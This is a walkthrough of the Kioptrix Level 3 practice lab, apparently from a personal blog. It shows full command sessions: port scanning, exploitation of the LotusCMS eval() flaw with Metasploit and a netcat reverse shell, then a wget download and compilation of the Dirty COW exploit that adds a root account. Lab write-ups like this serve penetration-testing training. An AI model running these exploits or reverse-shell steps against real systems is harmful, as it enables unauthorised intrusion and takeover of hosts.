This article shows walkthrough of Kioptrix Level3
Enumeration
Nmap
$ ipaddr=192.168.174.146 $ ports=$(nmap -p- --min-rate=1000 -T4 $ipaddr | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) $ nmap -sC -sV -p$ports $ipaddr Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-19 23:57 EDT Nmap scan report for kioptrix3.com (192.168.174.146) Host is up (0.00039s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA) |_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Ligoat Security - Got Goat? Security ... Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.68 seconds
Target only has started two service, SSH and Web.
Nikto
I use Nikto, but I don't get useful information.
$ nikto -h $ipaddr - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.174.146 + Target Hostname: 192.168.174.146 + Target Port: 80 + Start Time: 2021-09-20 03:52:44 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch + Cookie PHPSESSID created without the httponly flag + Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch. + Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun 5 15:22:00 2009 + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + /phpmyadmin/: phpMyAdmin directory found + OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + 7914 requests: 0 error(s) and 19 item(s) reported on remote host + End Time: 2021-09-20 03:53:12 (GMT-4) (28 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Web access
Target hosted blog with LotusCMS.
Searchsploit shows some exploit code for LotusCMS.
$ searchsploit Lotus CMS --------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------- --------------------------------- Lotus CMS Fraise 3.0 - Local File Inclusion / Remote Code Execution | php/webapps/15964.py Lotus Core CMS 1.0.1 - Local File Inclusion | php/webapps/47985.txt Lotus Core CMS 1.0.1 - Remote File Inclusion | php/webapps/5866.txt LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) | php/remote/18565.rb LotusCMS 3.0.3 - Multiple Vulnerabilities | php/webapps/16982.txt --------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
OWASP Zap
OWASP Zap shows target has server side code injection vulnerability.
I tested the parameter showed by OWASP Zap. Target returns eval error.
I guess LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) code can be useful
Exploit
Use metasploit or exploit code published Github by Hood3dRob1n
GitHub - Hood3dRob1n/LotusCMS-Exploit: LotusCMS 3.0 eval() Remote Command Execution
Use Metasploit
First, I use default payload php/meterpreter/reverse_tcp, but it's missed.
$ msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v6.1.5-dev ]
+ -- --=[ 2163 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Metasploit can be configured at startup, see
msfconsole --help to learn more
msf6 > search LotusCMS
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/lcms_php_exec 2011-03-03 excellent Yes LotusCMS 3.0 eval() Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/lcms_php_exec
msf6 > use exploit/multi/http/lcms_php_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/lcms_php_exec) >
msf6 exploit(multi/http/lcms_php_exec) > set RHOSTS kioptrix3.com
RHOSTS => kioptrix3.com
msf6 exploit(multi/http/lcms_php_exec) > set URI /
URI => /
msf6 exploit(multi/http/lcms_php_exec) > exploit
[*] Started reverse TCP handler on 192.168.174.132:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Exploit completed, but no session was created.
After miss of exploit, I change the payload php/meterpreter/reverse_tcp to generic/shell_reverse_tcp.
msf6 exploit(multi/http/lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf6 exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.174.146 yes The target host(s), see https://github.com/rapid7/metasploit-framewo
rk/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI / yes URI
VHOST no HTTP server virtual host
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.174.132 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf6 exploit(multi/http/lcms_php_exec) > exploit
[*] Started reverse TCP handler on 192.168.174.132:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.174.132:4444 -> 192.168.174.146:33062) at 2021-09-21 09:53:05 -0400
whoami
www-data
Success!!
Use Hood3dRob1n's Code
lotusRCE.sh requires target IP address and lotus cms's home directory.
Before execute shellcode, prepare waiting port such as nc -l -p 4242.
$./lotusRCE.sh 192.168.174.146 / Path found, now to check for vuln.... </html>Hood3dRob1n Regex found, site is vulnerable to PHP Code Injection! About to try and inject reverse shell.... what IP to use? 192.168.174.132 What PORT? 4242 OK, open your local listener and choose the method for back connect: 1) NetCat -e 2) NetCat /dev/tcp 3) NetCat Backpipe 4) NetCat FIFO 5) Exit #? 1
After select 1, terminal which prepared for waiting port may be used as shell.
$ nc -l -p 4242 whoami www-data
Privilege Escalation
Default shell is too inconvenience. I use python to use tty.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Kioptrix3:/home/www/kioptrix3.com$
I collect OS Information. Target machine is Linux kernel 2.6.24.
$ uname -a uname -a Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
Dirty Cow exploit may be used.(Dirty Cow is worked in Linux Kernel before 3.19.0-73.8).
www-data@Kioptrix3:/home/www/kioptrix3.com$ cd /tmp
www-data@Kioptrix3:/tmp$ wget http://192.168.174.132/40839.c
wget http://192.168.174.132/40839.c
--08:00:03-- http://192.168.174.132/40839.c
=> `40839.c'
Connecting to 192.168.174.132:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,814 (4.7K) [text/x-csrc]
100%[====================================>] 4,814 --.--K/s
08:00:03 (884.92 MB/s) - `40839.c' saved [4814/4814]
www-data@Kioptrix3:/tmp$ gcc -pthread 40839.c -o dirty -lcrypt
www-data@Kioptrix3:/tmp$ ./dirty password
Complete line:
firefart:fijI1lDcvwk7k:0:0:pwned:/root:/bin/bash
mmap: b7fe0000
$ su firefart
Password: password
firefart@Kioptrix3:/home/www/kioptrix3.com# id
uid=0(firefart) gid=0(root) groups=0(root)
I can get root group. That's all.
